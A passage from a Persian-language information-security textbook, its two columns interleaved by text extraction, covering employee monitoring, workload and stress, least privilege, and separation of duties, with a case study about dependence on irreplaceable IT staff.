‫ﻛﺎﺭﺁﻳﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﺮﺭﺳﻲ ﺷﻮﺩ‪ .‬ﺑﻄﻮﺭ‬
‫ﺩﻟﻴﻞ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﻧﻔـﻮﺫﮔﺮ ﺍﺣـﺴﺎﺱ ﻣـﻲﻛﻨـﺪ ﻛـﺴﻲ‬ ‫ﺧﺎﺹ‪ ،‬ﺩﺭ ﻗﺒﺎﻝ ﺭﺷﺪ ﺣﺮﻓﻪ ﺍﻱ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﻣﻮﻓـﻖ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﻣﺘﻮﺟﻪ ﻛﺎﺭﻫﺎﻱ ﺍﻭ ﻧﺨﻮﺍﻫﺪ ﺷـﺪ‪ .‬ﺍﮔـﺮ ﻳـﻚ ﺗﺒﻬﻜـﺎﺭ ﺑﺪﺍﻧـﺪ ﻛـﻪ‬ ‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﻣﺘﻴﺎﺯ ﻭ ﭘﺎﺩﺍﺵ ﺗﻌﻠﻖ ﺑﮕﻴﺮﺩ‪ .‬ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻣـﺸﻜﻼﺕ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻳﺶ ﺑﻪ ﺛﺒﺖ ﻣﻲﺭﺳﺪ ﻣﻤﻜﻦ ﺍﺯ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫـﺎﻱ ﻣﺨـﺮﺏ‬ ‫ﺑﺎﻳﺪ ﺑﺼﻮﺭﺗﻲ ﺳﺎﺯﻧﺪﻩ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺣﻞ ﺷﻮﻧﺪ‪ .‬ﺷﻤﺎ ﺑﺎﻳﺪ ﻛﺎﺭﻣﻨﺪﺍﻥ‬
‫ﺧﻮﺩ ﺻﺮﻓﻨﻈﺮ ﻛﻨﺪ‪ .‬ﻣﻨﻈـﻮﺭ ﺍﺯ ﺑـﺎﺯﺑﻴﻨﻲ ﺗﻨﻬـﺎ ﺑـﺎﺯﺑﻴﻨﻲ ﺛﺒﺘﻬـﺎﻱ‬ ‫ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺗﻮﺍﻧﺎﻳﻴﻬﺎ ﻭ ﺩﺭﻙ ﺑﻴﺸﺘﺮ ﺗﺸﻮﻳﻖ ﻛﻨﻴﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻧﻴــﺴﺖ؛ ﺑﻠﻜــﻪ ﮔﺰﺍﺭﺷــﺎﺕ ﻭﺭﻭﺩ ﻭ ﺧــﺮﻭﺝ ﺍﻓــﺮﺍﺩ ﺍﺯ‬
‫ﺳﺎﺧﺘﻤﺎﻥ‪ ،‬ﺳـﻮﺍﺑﻖ ﺍﺳـﺘﻔﺎﺩﺓ ﺍﻓـﺮﺍﺩ ﺍﺯ ﻗﻔﻠﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ،‬ﻭ‬ ‫ﺷـﻤﺎ ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ ﺍﺯ ﺑﻮﺟــﻮﺩ ﺁﻣـﺪﻥ ﺷـﺮﺍﻳﻄﻲ ﻛـﻪ ﺩﺭ ﺁﻧﻬــﺎ‬
‫ﻫﻤﭽﻨﻴﻦ ﻧﻮﺍﺭﻫﺎﻱ ﺗﻠﻮﻳﺰﻳﻮﻥ ﻣﺪﺍﺭ ﺑﺴﺘﻪ‪ ،‬ﻫﻤﮕﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ‬ ‫ﻛﺎﺭﻛﻨﺎﻥ ﺍﺣﺴﺎﺳﻬﺎﻱ ﻣﺨﺮﺑﻲ ﭼﻮﻥ ﺧﺴﺘﮕﻲ ﻣﻔﺮﻁ ﺍﺯ ﻛﺎﺭ ﺯﻳـﺎﺩ‪،‬‬
‫ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺗﺎ ﺯﻣﻴﻨﻪ ﺑﺮﺍﻱ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﺑﻴﺸﺘﺮ ﻣﻬﻴـﺎ‬ ‫ﺑﻲﺍﺣﺘﺮﺍﻣﻲ‪ ،‬ﻭ ﻳﺎ ﺑﻲﺗﻮﺟﻬﻲ ﭘﻴﺪﺍ ﻣـﻲﻛﻨﻨـﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴـﺪ‪.‬‬
‫ﺷﻮﺩ‪.‬‬ ‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ ﺩﺭ ﺍﺩﺍﺭﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻨﺠـﺮ ﺑـﻪ‬
‫ﺑﺎ ﺗﻤﺎﻡ ﺍﻳﻦ ﺍﺣﻮﺍﻝ ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺁﺛﺎﺭ ﻛﻨﺘﺮﻟﻬـﺎ ﭘﻨﻬـﺎﻧﻲ ﻫـﻢ ﺑـﻮﺩ‪.‬‬ ‫ﺑﻲﺗﻮﺟﻬﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺑﻪ ﻣﻨﺎﻓﻊ ﺳﺎﺯﻣﺎﻥ ﺷـﻮﺩ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ‬
‫ﺍﻓﺮﺍﺩ ﺍﺯ ﺍﻳﻨﻜﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﻋﺘﻤﺎﺩ ﻧﺸﻮﺩ ﻭ ﺑﻄﻮﺭ ﻣﺨﻔﻴﺎﻧﻪ ﺗﺤﺖ ﻧﻈـﺮ‬ ‫ﺍﺳﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺭ ﻓﺮﺻﺘﻬﺎﻱ ﻣﻨﺎﺳـﺒﺘﺮ ﺷـﻐﻠﻲ‬
‫ﺑﺎﺷﻨﺪ ﺍﺣﺴﺎﺱ ﻧﺎﺧﺮﺳﻨﺪﻱ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﺍﮔﺮ ﺑﻔﻬﻤﻨـﺪ ﻛـﻪ ﺗﺤـﺖ‬ ‫ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺮﻙ ﻛﻨﻨﺪ؛ ﻳﺎ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ‬
‫ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺼﺒﺎﻧﻲ ﺷﻮﻧﺪ ﻭ ﺣﺘـﻲ ﻋﻤﻠﻜـﺮﺩﻱ‬ ‫ﺍﻧﺘﻘﺎﻣﮕﻴﺮﻱ ﺩﺭ ﺑﻌﻀﻲ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﺷﻮﺑﮕﺮﺍﻧﻪ ﻋﻠﻴﻪ ﺷﻤﺎ ﻫﻤﻜﺎﺭﻱ‬
‫ﺍﻓﺮﺍﻃﻲ ﺍﺯ ﺧﻮﺩ ﺑﺮﻭﺯ ﺩﻫﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺩﺍﺩﺳـﺮﺍﻫﺎ‬ ‫ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﺿﺎﻓﻪﻛﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺜﻨﺎ ‪ -‬ﻭ ﻧﻪ ﻳﻚ ﺭﻭﺍﻝ ‪-‬‬
‫ﺩﻳﺪﻩﺷﺪﻩ ﻛﻪ ﻗـﺎﻧﻮﻥ ﻛـﺎﺭ ﻭ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻱ ﺍﺳـﺘﺨﺪﺍﻣﻲ ﺗﻮﺍﻧـﺴﺘﻪ‬ ‫ﺑﺎﺷﺪ ﻭ ﺑﻪ ﺗﻤﺎﻡ ﻛﺎﺭﻣﻨﺪﺍﻥ ‪ -‬ﺧﺼﻮﺻﹰﺎ ﺁﻧﻬـﺎﻳﻲ ﻛـﻪ ﺩﺭ ﭘـﺴﺘﻬﺎﻱ‬
‫ﺑﺎﻋﺚ ﺭﻭﺑﺮﻭ ﺷﺪﻥ ﻛﺎﺭﻓﺮﻣﺎ ﺑﺎ ﺩﺍﺩﺭﺳﻴﻬﺎﻱ ﺳﻨﮕﻴﻦ ﻣﺪﻧﻲ ﺷﻮﺩ‪.‬‬ ‫ﺣﺴﺎﺱ ﻫﺴﺘﻨﺪ ‪ -‬ﺑﺎﻳﺪ ﺗﻌﻄﻴﻼﺕ ﻭ ﺍﻭﻗـﺎﺕ ﻓﺮﺍﻏـﺖ ﻛـﺎﻓﻲ ﺩﺍﺩﻩ‬
‫ﺷﻮﺩ‪ .‬ﺍﺿﺎﻓﻪﻛﺎﺭﻱ ﺑـﻪ ﺷـﺪﺕ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺭﺍ ﺧـﺴﺘﻪ ﻣـﻲ ﻛﻨـﺪ ﻭ‬
‫ﺍﮔﺮ ﻧﻈﺎﺭﺕ ﺑﺴﻴﺎﺭ ﺩﻗﻴﻖ ﺑﺎﺷﺪ ﺻﺮﻑ ﻣﻄﻠﻊ ﻛـﺮﺩﻥ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺍﺯ‬ ‫ﺧﺴﺘﮕﻲ ﻧﻴﺰ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺿﺮﻳﺐ ﺧﻄـﺎﻱ ﺁﻧﻬـﺎ ﺑـﺎﻻ ﺭﻭﺩ‪،‬‬
‫ﺍﻳﻨﻜﻪ ﺗﺤﺖ ﻧﻈﺮ ﻫﺴﺘﻨﺪ ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ .‬ﺑﻌﻀﻲ ﻣﻄﺎﻟﻌـﺎﺕ ﻧـﺸﺎﻥ‬ ‫ﻣﺘﻮﺟﻪ ﺍﺷﻜﺎﻻﺕ ﻧﺸﻮﻧﺪ ﻳﺎ ﺍﺯ ﺁﻧﻬﺎ ﭼﺸﻢﭘﻮﺷﻲ ﻛﻨﻨﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ‬
‫ﺩﺍﺩﻩ ﻛﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭﻗﺘﻲ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺷﺪﻳﺪ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ‬ ‫ﺍﺯ ﻧﻈﺮ ﻋﺎﻃﻔﻲ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺩﺭ ﺯﻧﺪﮔﻲ ﺧﺼﻮﺻﻲ‬
‫ﻼ ﺍﮔﺮ ﺷﻤﺎ‬ ‫ﻛﺎﺭﺍﻳﻲ ﻛﻤﺘﺮ ﻭ ﺭﻓﺘﺎﺭ ﻧﺎﻣﻨﺎﺳﺒﺘﺮﻱ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ‪ .‬ﻣﺜ ﹰ‬ ‫ﺁﻧﻬﺎ ﻧﻴﺰ ﻓﺸﺎﺭﻫﺎﻱ ﻋﺼﺒﻲ ﺑﻮﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺁﻣﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺧﺎﻧﻮﺍﺩﻩﻫـﺎ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﺯﻣﺎﻥ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﻫﺮ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛﻪ ﺍﺯ ﺁﻥ‬ ‫ﻭ ﻋﺰﻳﺰﺍﻧﺸﺎﻥ ﻫﻢ ﻣﻲﺧﻮﺍﻫﻨﺪ ﮔﻬﮕﺎﻩ ﺩﺭ ﻃﻮﻝ ﺭﻭﺯ ﺁﻧﻬﺎ ﺭﺍ ﺑﺒﻴﻨﻨﺪ‪.‬‬
‫ﺑﺎﺯﺩﻳﺪ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒـﺎﺭ ﺑـﻪ ﺍﺳـﺘﺮﺍﺣﺖ‬ ‫ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﺑﻴﺶ ﺍﺯ ﺍﻧﺪﺍﺯﻩ ﺗﺤﺖ ﻓﺸﺎﺭ ﻭ ﺧـﺴﺘﻪ ﺑﺎﺷـﻨﺪ‬
‫ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺍﻳﻦ ﻣﺴﺌﻠﻪ‬ ‫ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺁﺯﺭﺩﻩﺧـﺎﻃﺮ ﺷـﻮﻧﺪ ﻭ ﺑـﺪﻳﻬﻲ‬
‫ﻼ ﺻﺤﺖ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺑﻬﺘﺮﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﺁﻧﻬـﺎﻳﻲ ﻫـﺴﺘﻨﺪ‬ ‫ﻛﺎﻣ ﹰ‬ ‫ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴﺖ ﻫﻴﭻ ﻛﻤﻜﻲ ﻧﺨﻮﺍﻫﺪ ﻛﺮﺩ‪.‬‬
‫ﻛﻪ ﺑﺎ ﻧﻈﺮ ﻣﺴﺎﻋﺪ ﻭ ﺗﺸﺮﻳﻚ ﻣﺴﺎﻋﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﺪﻭﻳﻦ ﺷـﻮﻧﺪ ﻭ‬
‫ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﺶ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﻫﻢ )ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﺨﺸﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ(‬ ‫ﺑﻄﻮﺭ ﻛﻠﻲ ﻋﻼﺋﻢ ﻓﺸﺎﺭﻫﺎﻱ ﺭﻭﺍﻧـﻲ ﺯﻳـﺎﺩ‪ ،‬ﻣـﺴﺎﺋﻞ ﺷﺨـﺼﻲ ﻭ‬
‫ﻫﻨﮕﺎﻡ ﺗﺪﻭﻳﻦ ﺁﻥ ﺣﻀﻮﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻣﺸﻜﻼﺕ ﻛﺎﺭﻛﻨﺎﻧﻲ ﻛﻪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﻧـﺴﺒﺘﹰﺎ‬
‫‪١٦٣‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺳﻴﺴﺘﻢ ﺣﺴﺎﺑﺪﺍﺭﻱ ﮔﻤﺮﻛﻲ ﺧﻮﺩ ﻭ ﻭﺍﺭﺩﺍﺕ ﺳﻔﺎﺭﺷﺎﺕ ﻧﻤﻮﺩ‪ .‬ﺍﻳﻦ‬ ‫ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻲ ﻭ ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ‬
‫ﺳﻴﺴﺘﻢ ﺑﺎ ﻳﻚ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻛﻪ ﺑﻪ ﺳﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ‬ ‫ﺍﺻﻮﻝ ﺩﺳﺘﺮﺳﻲ ﺣﺪﺍﻗﻠﻲ ﻭ ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ ﺭﺍ ﺑﻪ ﺩﻗـﺖ ﺩﺭﻧﻈـﺮ‬
‫ﻧﺒﻮﺩ ﺗﻬﻴﻪ ﺷﺪ ﻭ ﺷﺮﻛﺘﻲ ﻛﻪ ﺁﻧﺮﺍ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺑﻮﺩ ﭘـﺲ ﺍﺯ ﻣـﺪﺕ‬ ‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﻳﻦ ﺍﺻﻮﻝ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﻛـﺎﺭﺁﻳﻲ ﺧـﻮﺩ ﺭﺍ ﺛﺎﺑـﺖ‬
‫ﻛﻮﺗﺎﻫﻲ ﻛﺎﺭ ﺗﺠﺎﺭﺕ ﺭﺍ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺖ‪ .‬ﺩﺭ ﺁﻥ ﺷﺮﻛﺖ ﺗﻨﻬﺎ ﺩﻭ ﻧﻔﺮ‬ ‫ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻫﺮﮔﺎﻩ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺷﻤﺎ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺑﺎﺷـﻨﺪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ‬
‫ﺑﻪ ﻧﺤـﻮﺓ ﻛـﺎﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﺁﺷـﻨﺎ ﺑﻮﺩﻧـﺪ‪ :‬ﻣـﺪﻳﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺲ ﺍﻭ‪ .‬ﺍﻳـﻦ ﺩﻭ ﻧﻔـﺮ‬‫ﺍﻃﻼﻋﺎﺕ ﻣﺪﻳﺮﻳﺖ )‪ ٩٨(MIS‬ﻭ ﻧﻴﺰ ﺑﺮﻧﺎﻣﻪﻧﻮﻳ ﹺ‬
‫ﻣﺴﺌﻮﻝ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺳﻴـﺴﺘﻢ ﺣـﺴﺎﺑﺪﺍﺭﻱ‪،‬‬ ‫ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻲ‬
‫ﺁﻣﺎﺩﻩﺳﺎﺯﻱ ﮔﺰﺍﺭﺷـﺎﺕ ﺳـﺎﻻﻧﻪ‪ ،‬ﺗﻌﻤﻴـﺮ ﺗﺠﻬﻴـﺰﺍﺕ ﺍﺯﻛﺎﺭﺍﻓﺘـﺎﺩﺓ‬ ‫ﺍﻳﻦ ﺍﺻﻞ ﻣﻲﮔﻮﻳﺪ ﻛﻤﺘﺮﻳﻦ ﺩﺳﺘﺮﺳﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﺭﺍ‬
‫ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻭ ﺣﺘﻲ ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ )ﻛـﻪ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤﻮﻃـﺔ‬ ‫ﻲ ﻣﺤﺪﻭﺩﺷـﺪﻩ‪ ،‬ﻫـﻢ ﺷـﺎﻣﻞ‬ ‫ﺑﻪ ﻫﺮ ﻓـﺮﺩ ﺑﺪﻫﻴـﺪ‪ .‬ﺍﻳـﻦ ﺩﺳﺘﺮﺳـ ﹺ‬
‫ﺍﺩﺍﺭﻱ ﺷﺮﻛﺖ ﻭ ﺩﺭ ﺩﻓﺘﺮ ﻣﺪﻳﺮ ‪ MIS‬ﺫﺧﻴﺮﻩ ﻣﻲﺷﺪ( ﺑﻮﺩﻧﺪ‪.‬‬ ‫ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ﺍﺳﺖ )ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﺷـﺒﻜﻪﻫـﺎ‪،‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ( ﻭ ﻫﻢ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ )ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‪ ،‬ﻧﻮﺍﺭﻫـﺎﻱ‬
‫ﺲ ﺍﻭ ﻳـﻚ ﺭﻭﺯ ﺩﺭ ﺭﺍﻩ ﺩﭼـﺎﺭ ﻳـﻚ‬ ‫ﺍﮔﺮ ﻣﺪﻳﺮ ‪ MIS‬ﻭ ﺑﺮﻧﺎﻣﻪﻧﻮﻳ ﹺ‬ ‫ﭘــﺸﺘﻴﺒﺎﻥ ﻭ ﺳــﺎﻳﺮ ﺗﺠﻬﻴ ـﺰﺍﺕ ﺟــﺎﻧﺒﻲ(‪ .‬ﺍﮔــﺮ ﻫ ـﺮ ﻛــﺎﺭﺑﺮ ﺭﻭﻱ ﻫﻤــﺔ‬
‫ﺗﺼﺎﺩﻑ ﻣﺮﮔﺒﺎﺭ ﻣﻲﺷﺪﻧﺪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣـﻲﺍﻓﺘـﺎﺩ؟ ﺍﮔـﺮ ﺑـﻪ ﻣـﺪﻳﺮ‬ ‫ﺳﻴﺴﺘﻤﻬﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻭ ﺑﻪ ﺗﻤﺎﻡ ﻣﻨﺎﺑﻊ ﺩﺳﺘﺮﺳـﻲ ﻓﻴﺰﻳﻜـﻲ‬
‫‪ MIS‬ﺷﻐﻠﻲ ﻣﻨﺎﺳﺒﺘﺮ ﺑﺎ ﺣﻘﻮﻕ ﭼﻨﺪﺑﺮﺍﺑﺮ ﭘﻴﺸﻨﻬﺎﺩ ﻣـﻲﺷـﺪ ﭼـﻪ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻧﻈـﺮ ﻣﻴـﺰﺍﻥ ﺗﻬﺪﻳـﺪ ﺗﻘﺮﻳﺒـﹰﺎ‬
‫ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﻣﻲﺩﺍﺩ؟ ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﻧـﻮﻳﺲ ﺑﺨـﺎﻃﺮ ﻧﻴـﺎﺯ ﺷـﺮﻛﺖ ﺑـﻪ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻳﻜﺴﺎﻥ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬


‫ﻧﮕﻬﺪﺍﺭﻱ ﺍﻭ ﺩﺭ ﭘﺴﺖ ﺧﻮﺩ ﻧﻤﻲﺗﻮﺍﻧﺴﺖ ﺍﺭﺗﻘﺎﻱ ﺳـﺎﺯﻣﺎﻧﻲ ﭘﻴـﺪﺍ‬
‫ﻛﻨﺪ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﻛﺎﺭ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺩﻟـﺴﺮﺩ ﻭ ﻋـﺼﺒﺎﻧﻲ ﻣـﻲﺷـﺪ‬ ‫ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ‬
‫ﭼﻄﻮﺭ؟‬ ‫ﺍﻳﻦ ﺍﺻﻞ ﺑﺮ ﺍﻳﻦ ﻣﺒﻨﺎ ﺍﺳـﺘﻮﺍﺭ ﺍﺳـﺖ ﻛـﻪ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺑـﺎ ﺩﻗـﺖ‬
‫ﺍﻳﻨﻜﻪ ﭘﺮﺳﻨﻞ ﺍﺻﻠﻲ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺷﻮﻧﺪ ﻳﻜﻲ ﺍﺯ ﻣﻌﺎﻳﺐ ﻭ‬ ‫ﻭﻇــﺎﻳﻒ ﺍﻓــﺮﺍﺩ ﺭﺍ ﺍﺯ ﻫــﻢ ﺟــﺪﺍ ﻛﻨﻴـﺪ‪ .‬ﺩﺭ ﺍﻳﻨــﺼﻮﺭﺕ ﻛــﺴﺎﻧﻴﻜﻪ‬
‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﺟﺪﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻣﺤﺴﻮﺏ ﻣﻲﺷـﻮﺩ ‪ -‬ﻭ‬ ‫ﻋﻬﺪﻩﺩﺍﺭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳﺖ ﻫﺴﺘﻨﺪ ﺧﻮﺩ ﻫﻢ ﻧﺨﻮﺍﻫﻨـﺪ‬
‫ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﺑﻨﺪﺭﺕ ﺑﻪ ﺍﻳﻦ ﻫﺰﻳﻨـﻪ ﻫـﺎ ﺗﻮﺟـﻪ ﻛـﺎﻓﻲ‬ ‫ﺗﻮﺍﻧﺴﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳﺖ ﻛﻨﻨـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻭﺍﮔـﺬﺍﺭ‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﻳﻜـﻲ ﺩﻳﮕـﺮ ﺍﺯ ﺩﻻﻳـﻞ ﺑﻜـﺎﺭﮔﻴﺮﻱ‬ ‫ﻛﺮﺩﻥ ﻫﻤﺔ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴـﺘﻲ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﻪ ﺗﻨﻬـﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺣﺎﺿﺮ ﻭ ﺁﻣﺎﺩﻩ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ‬ ‫ﻳﻜﻨﻔﺮ ﻛﺎﺭ ﺧﻄﺮﻧﺎﻛﻲ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻧﻮﺷﺘﺎﺭﻱ ‪ -‬ﺑﻄﻮﺭﻳﻜﻪ ﻳﻚ ﻓﺮﺩ ﺗﺎﺯﻩﻭﺍﺭﺩ ﺑﺘﻮﺍﻧﺪ ﺑﺮﺍﺣﺘﻲ ﺟﺎﻳﮕﺰﻳﻦ‬ ‫ﺷﻮﺩ ﻛﻪ ﺁﻥ ﺷـﺨﺺ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺳـﺮﭘﻴﭽﻲ ﻛﻨـﺪ ﻭ‬
